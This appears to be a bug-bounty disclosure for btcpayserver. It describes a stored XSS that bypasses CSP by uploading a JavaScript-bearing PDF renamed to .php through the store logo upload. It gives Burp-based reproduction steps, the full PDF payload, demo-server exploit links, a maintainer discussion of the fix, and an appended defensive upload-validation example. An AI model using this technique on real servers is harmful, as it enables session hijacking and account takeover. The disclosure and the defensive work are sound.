File Upload leads to Stored XSS bypassing CSP in btcpayserver/btcpayserver
Reported on Feb 9th 2023
Description
Stored cross-site scripting (also known as second-order or persistent XSS) arises when an application receives data from an untrusted source and includes that data within its later HTTP responses in an unsafe way.
1. Log in to your application and create a Store called "Test"; leave all the other details as default.
2. Navigate to the "Store Settings -> General" tab.
3. Under the "Branding" section there is a "Choose File" button to select a logo for our store.
4. Select the "Choose File" option to select an image; select any ".png" image you want.
5. Intercept the POST request for the "Choose File" option using Burp Suite.
6. First delete the content of the uploaded ".png" file, then change the extension from ".png" to ".php" (i.e. filename="profile-picture.php") and add the payload below as the content.
Payload:

```text
%PDF-1.3 %���� 1 0 obj <</Pages 2 0 R /Type /Catalog>> endobj 2 0 obj <</Count 1 /Kids [3 0 R] /Type /Pages>> endobj 3 0 obj <</AA <</O <</JS ( try { app.alert("bypass CSP XSS") } catch (e) { app.alert(e.message); } ) /S /JavaScript>>>> /Annots [] /Contents 4 0 R /MediaBox [0 0 612 792] /Parent 2 0 R /Resources <</Font <</F1 <</BaseFont /Helvetica /Subtype /Type1 /Type /Font>>>>>> /Type /Page>> endobj 4 0 obj <</Length 21>> stream
BT /F1 24 Tf ET
endstream endobj xref 0 5 0000000000 65535 f 0000000015 00000 n 0000000062 00000 n 0000000117 00000 n 0000000424 00000 n trailer
<</Root 1 0 R /Size 5>> startxref 493 %%EOF
```
7. Send the request and open the uploaded image; you can see the XSS.
Impact
XSS can cause a variety of problems for the end user that range in severity from an annoyance to complete account compromise. The most severe XSS attacks involve disclosure of the user's session cookie, allowing an attacker to hijack the user's session and take over the account.
References
This should already have been reported, and fixed 3 days ago. And I can't reproduce since then. Please try to upload a file on https://mainnet.demo.btcpayserver.org/ and give me the link to it.
If you can show a javascript alert, I will mark this valid.
I tried to browse the link in the video showcasing the CSP https://mainnet.demo.btcpayserver.org/LocalStorage/46233dda-aef4-43fb-b081-6f98ecd62b4f-cspxss.php but it is not found. I don't think I misspelled it.
You can try this url, I re-uploaded it
https://mainnet.demo.btcpayserver.org/LocalStorage/20ae0aba-2b3b-4b6e-952a-544d4ef6c51a-exploit.php
This is also another PoC that proves that I am able to print JavaScript code:
https://www.youtube.com/watch?v=HE34men1sKc
How the fuck is it possible? We pushed a fix with "script-src: ;" yesterday, but this doesn't stop this one...
Do you have a suggestion to prevent this? We can't really detect the type of file that is uploaded just by reading the content of the file. There will always be a way to avoid the detection...
You can prevent uploading files except in certain formats, or you can check the body of the file uploaded by the user.
https://mainnet.demo.btcpayserver.org/LocalStorage/20ae0aba-2b3b-4b6e-952a-544d4ef6c51a-exploit.php
isn't executable anymore, and PDFs can't be uploaded anymore either.
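The thread above ends on the two controls the reporter suggests (restrict the accepted formats, and check the uploaded body) plus the observation that a CSP `script-src` alone did not stop a PDF with embedded JavaScript. The following is an added example, not BTCPay Server's code, of how a branding-logo endpoint can combine the two checks and serve stored files so the browser cannot reinterpret them; the extension allow-list, magic-byte table and header set are assumptions for the example, and the sample body is a constructed prefix of the payload from this report.

```python
import os
from typing import Optional

# Hypothetical policy for a logo upload endpoint: each accepted extension maps to the
# magic bytes its body must start with and the MIME type the server will later send.
ALLOWED_TYPES = {
    ".png":  (b"\x89PNG\r\n\x1a\n", "image/png"),
    ".jpg":  (b"\xff\xd8\xff",      "image/jpeg"),
    ".jpeg": (b"\xff\xd8\xff",      "image/jpeg"),
    ".gif":  (b"GIF8",              "image/gif"),
}

# Signatures a browser or plugin may treat as active content whatever the extension says.
ACTIVE_SIGNATURES = (b"%pdf-", b"<?xml", b"<svg", b"<!doctype html", b"<html", b"<script")

# Constructed sample: the start of the PDF payload from the report, renamed to .php.
PDF_SAMPLE = b"%PDF-1.3 1 0 obj <</Pages 2 0 R /Type /Catalog>> endobj"
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16


def validate_upload(filename: str, body: bytes) -> Optional[str]:
    """Return the MIME type to store alongside the file, or None to reject the upload."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_TYPES:
        return None                       # "profile-picture.php" is refused on name alone
    magic, mime = ALLOWED_TYPES[ext]
    if not body.startswith(magic):
        return None                       # a PDF body saved as logo.png fails the magic check
    if body[:32].lstrip().lower().startswith(ACTIVE_SIGNATURES):
        return None                       # defence in depth if the allow-list ever widens
    return mime


def response_headers(mime: str) -> dict:
    """Headers for serving a stored upload; the type comes from validation, never from the request."""
    return {
        "Content-Type": mime,
        "X-Content-Type-Options": "nosniff",      # no MIME sniffing of the stored body
        "Content-Disposition": "inline",           # no user-controlled filename echoed here
        # CSP did not stop the PDF case in the thread; it is a second layer, not the control.
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }
```

The body check is what closes the renamed-extension trick from step 6 of the report; `nosniff` keeps a browser from guessing a different type for a file that passed.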